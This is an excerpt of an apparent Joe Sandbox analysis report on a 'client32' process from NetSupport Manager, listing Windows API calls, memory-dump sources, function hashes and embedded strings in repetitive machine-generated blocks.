                                                                                                                                                                                                    • CreateFontIndirectA.GDI32(FFFFFFF0), ref: 111313FB
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CreateFontIndirect$InfoParametersSystem
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3386289337-0
                                                                                                                                                                                                    • Opcode ID: cddf9315703bad504045fd98c9e1cfe8d04d1f92840bc27388ccda177a2b43ee
                                                                                                                                                                                                    • Instruction ID: e4efc710e3e979ce8ff1f48ebad8b7127cba25ea1afedff09802414c266bcb73
                                                                                                                                                                                                    • Opcode Fuzzy Hash: cddf9315703bad504045fd98c9e1cfe8d04d1f92840bc27388ccda177a2b43ee
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 92015E719007189BD7A0DFA9DC44BDAF7F9AB84310F1042AAD519A6290DB706988CF51
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 1110C420: wsprintfA.USER32 ref: 1110C454
                                                                                                                                                                                                    • CreateWindowExA.USER32(00000000,edit,00000000,40040004,?,?,?,?,?,00000002,00000000,?), ref: 11007327
                                                                                                                                                                                                    • SetFocus.USER32(?), ref: 11007383
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CreateFocusWindowwsprintf
                                                                                                                                                                                                    • String ID: edit
                                                                                                                                                                                                    • API String ID: 4214736919-2167791130
                                                                                                                                                                                                    • Opcode ID: 90178d24ed7dd829a3d0cac89e5aa5b0d91151dfc4ee68e84738eaf518688980
                                                                                                                                                                                                    • Instruction ID: f78834b4020d8e2e6f829c6f5032a1a8cba214c943ee8e0f2be50220b25a4479
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 90178d24ed7dd829a3d0cac89e5aa5b0d91151dfc4ee68e84738eaf518688980
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4851B0B5A00606AFE741CFA8DC80BABB7E5FB48354F11856DF995C7340EA34A942CB61
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 110948B0: GetSystemMetrics.USER32(0000004C), ref: 110948BE
                                                                                                                                                                                                      • Part of subcall function 110948B0: GetSystemMetrics.USER32(0000004D), ref: 110948C7
                                                                                                                                                                                                      • Part of subcall function 110948B0: GetSystemMetrics.USER32(0000004E), ref: 110948CE
                                                                                                                                                                                                      • Part of subcall function 110948B0: GetSystemMetrics.USER32(00000000), ref: 110948D7
                                                                                                                                                                                                      • Part of subcall function 110948B0: GetSystemMetrics.USER32(0000004F), ref: 110948DD
                                                                                                                                                                                                      • Part of subcall function 110948B0: GetSystemMetrics.USER32(00000001), ref: 110948E5
                                                                                                                                                                                                    • GetRegionData.GDI32(?,00001000,?), ref: 1103F2D5
                                                                                                                                                                                                      • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                                                                                                      • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                                                                                                      • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                                                                                                      • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: MetricsSystem$DataErrorExitLastMessageProcessRegionwsprintf
                                                                                                                                                                                                    • String ID: IsA()$e:\nsmsrc\nsm\1210\1210f\ctl32\DataStream.h
                                                                                                                                                                                                    • API String ID: 1231476184-2270926670
                                                                                                                                                                                                    • Opcode ID: bcf8010bd49bb8a48e5ff97e5ecb267e14ecb5a38bedc9232b3b103d8f10203e
                                                                                                                                                                                                    • Instruction ID: 7bd6763c5981859c823165d8063a1c4bf52d6bb4432795ccb6ce09120d22f5b2
                                                                                                                                                                                                    • Opcode Fuzzy Hash: bcf8010bd49bb8a48e5ff97e5ecb267e14ecb5a38bedc9232b3b103d8f10203e
                                                                                                                                                                                                    • Instruction Fuzzy Hash: C2613DB5E001AA9FCB24CF54CD84ADDF3B5BF88304F0082D9E689A7244DAB46E85CF51
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • SHGetFolderPathA.SHFOLDER(00000000,00008005,00000000,00000000,00000000), ref: 1109F821
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: FolderPath
                                                                                                                                                                                                    • String ID: Journal$JournalPath
                                                                                                                                                                                                    • API String ID: 1514166925-2350371490
                                                                                                                                                                                                    • Opcode ID: 571c3e433b90cf46d3ab01637cb7f0e16e325cbb2de70bdab3eef7d4294da6b6
                                                                                                                                                                                                    • Instruction ID: 434bd909b2f05ad915dc038db26f6da4a37d97d5394bf5eacfbf409b598c8e34
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 571c3e433b90cf46d3ab01637cb7f0e16e325cbb2de70bdab3eef7d4294da6b6
                                                                                                                                                                                                    • Instruction Fuzzy Hash: D1414A31E042AE5BD712CF288CA4BDBFFE4EF45744F1045E9D8999B340EA31A908C792
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 110758B0: GlobalAddAtomA.KERNEL32(NSMCoolbar), ref: 11075905
                                                                                                                                                                                                      • Part of subcall function 110758B0: GetSysColor.USER32 ref: 11075923
                                                                                                                                                                                                      • Part of subcall function 110758B0: GetSysColor.USER32(00000014), ref: 1107592A
                                                                                                                                                                                                      • Part of subcall function 110758B0: GetSysColor.USER32(00000010), ref: 11075931
                                                                                                                                                                                                      • Part of subcall function 110758B0: GetSysColor.USER32(00000008), ref: 11075938
                                                                                                                                                                                                      • Part of subcall function 110758B0: GetSysColor.USER32(00000016), ref: 1107593F
                                                                                                                                                                                                      • Part of subcall function 110AE730: InitializeCriticalSection.KERNEL32(00000154,00000000,110BD632,BBC4A55B,00000000,00000000,00000000,00000000,00000000,111819F4,000000FF,?,1105D27F,?), ref: 110AE741
                                                                                                                                                                                                      • Part of subcall function 1110D060: GetCurrentThreadId.KERNEL32 ref: 1110D0F6
                                                                                                                                                                                                      • Part of subcall function 1110D060: InitializeCriticalSection.KERNEL32(-00000010,?,000000FF,?,11026F57,00000001,000003BC), ref: 1110D109
                                                                                                                                                                                                      • Part of subcall function 1110D060: InitializeCriticalSection.KERNEL32(111EC8A0,?,000000FF,?,11026F57,00000001,000003BC), ref: 1110D118
                                                                                                                                                                                                      • Part of subcall function 1110D060: EnterCriticalSection.KERNEL32(111EC8A0,?,000000FF,?,11026F57), ref: 1110D12C
                                                                                                                                                                                                      • Part of subcall function 1110D060: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,000000FF,?,11026F57), ref: 1110D152
                                                                                                                                                                                                    • OleInitialize.OLE32(00000000), ref: 110BD6C2
                                                                                                                                                                                                      • Part of subcall function 110CA340: InterlockedIncrement.KERNEL32(111E2E04), ref: 110CA348
                                                                                                                                                                                                      • Part of subcall function 110CA340: CoInitialize.OLE32(00000000), ref: 110CA36C
                                                                                                                                                                                                    • GlobalAddAtomA.KERNEL32(NSMCobrowse), ref: 110BD715
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ColorInitialize$CriticalSection$AtomGlobal$CreateCurrentEnterEventIncrementInterlockedThread
                                                                                                                                                                                                    • String ID: NSMCobrowse
                                                                                                                                                                                                    • API String ID: 2361268844-2243205248
                                                                                                                                                                                                    • Opcode ID: 41011bd8560fb5f141d205fb2c1a52753a0e4664b1f28dd26127bffe8820e076
                                                                                                                                                                                                    • Instruction ID: 226d89ac1b4541342643fefbc1fc1e817936d527e4f01f79d48319a6218e5bfa
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 41011bd8560fb5f141d205fb2c1a52753a0e4664b1f28dd26127bffe8820e076
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 92513778904B85DFD720CFA9C59479EFBE4BF18308F5089ADD4AA93241DB747604CB62
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,00000000,00000000,765A2E90), ref: 110EB1B1
                                                                                                                                                                                                    • RegQueryValueExA.ADVAPI32(000007FF,?,00000000,?,00000000,000007FF), ref: 110EB20A
                                                                                                                                                                                                      • Part of subcall function 1115F3B5: HeapFree.KERNEL32(00000000,00000000,?,11167F76,00000000,?,110B7069), ref: 1115F3CB
                                                                                                                                                                                                      • Part of subcall function 1115F3B5: GetLastError.KERNEL32(00000000,?,11167F76,00000000,?,110B7069), ref: 1115F3DD
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: QueryValue$ErrorFreeHeapLast
                                                                                                                                                                                                    • String ID: Error %d getting %s
                                                                                                                                                                                                    • API String ID: 3552358119-2709163689
                                                                                                                                                                                                    • Opcode ID: 0046b0664d19f7641861727aad713b787865af9cbe24966e149ad3e7038788ce
                                                                                                                                                                                                    • Instruction ID: 4c35e499aaf5ad9a009ae928ade364ef1dd2f983720d507f3f6301ea2f5437f7
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0046b0664d19f7641861727aad713b787865af9cbe24966e149ad3e7038788ce
                                                                                                                                                                                                    • Instruction Fuzzy Hash: FA316175D001299FDB90DA55CC84BAEB7F9AF45304F05C0E9E959A7240DE306E85CFE1
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • DeleteObject.GDI32(?), ref: 1101F664
                                                                                                                                                                                                      • Part of subcall function 1115BD70: SetPropA.USER32(00000000,00000000), ref: 1115BD8E
                                                                                                                                                                                                      • Part of subcall function 1115BD70: SetWindowLongA.USER32(00000000,000000FC,1115B780), ref: 1115BD9F
                                                                                                                                                                                                      • Part of subcall function 1115AC80: SetPropA.USER32(?,?,?), ref: 1115ACD5
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • OnDestroy - delete m_WBFrameWnd, xrefs: 1101F62A
                                                                                                                                                                                                    • Chat Window Destroyed, xrefs: 1101F57B
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Prop$DeleteLongObjectWindow
                                                                                                                                                                                                    • String ID: Chat Window Destroyed$OnDestroy - delete m_WBFrameWnd
                                                                                                                                                                                                    • API String ID: 2163963939-4047192309
                                                                                                                                                                                                    • Opcode ID: f958c79b477abf9a0fea9acb7af46adbfcf8098553b161982d9ac6736f897051
                                                                                                                                                                                                    • Instruction ID: 09d21a9cb39090529c9d6542565f0688f2ad478e5cfbe18cf914d43a02743bba
                                                                                                                                                                                                    • Opcode Fuzzy Hash: f958c79b477abf9a0fea9acb7af46adbfcf8098553b161982d9ac6736f897051
                                                                                                                                                                                                    • Instruction Fuzzy Hash: C731E4B5B00701ABE350CF65D880F6FF7A6EF85718F14461DE86A5B390DB75B9008B92
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • FormatMessageA.KERNEL32(00000400,?,00000000,00000000,BBC4A55B,00000401,?,?,00000000,BBC4A55B), ref: 111432DB
                                                                                                                                                                                                    • wvsprintfA.USER32(BBC4A55B,?,?), ref: 111432F2
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • ERROR TOO LONG: fmt_string=<%s>, s=<%.80s>, xrefs: 1114330A
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
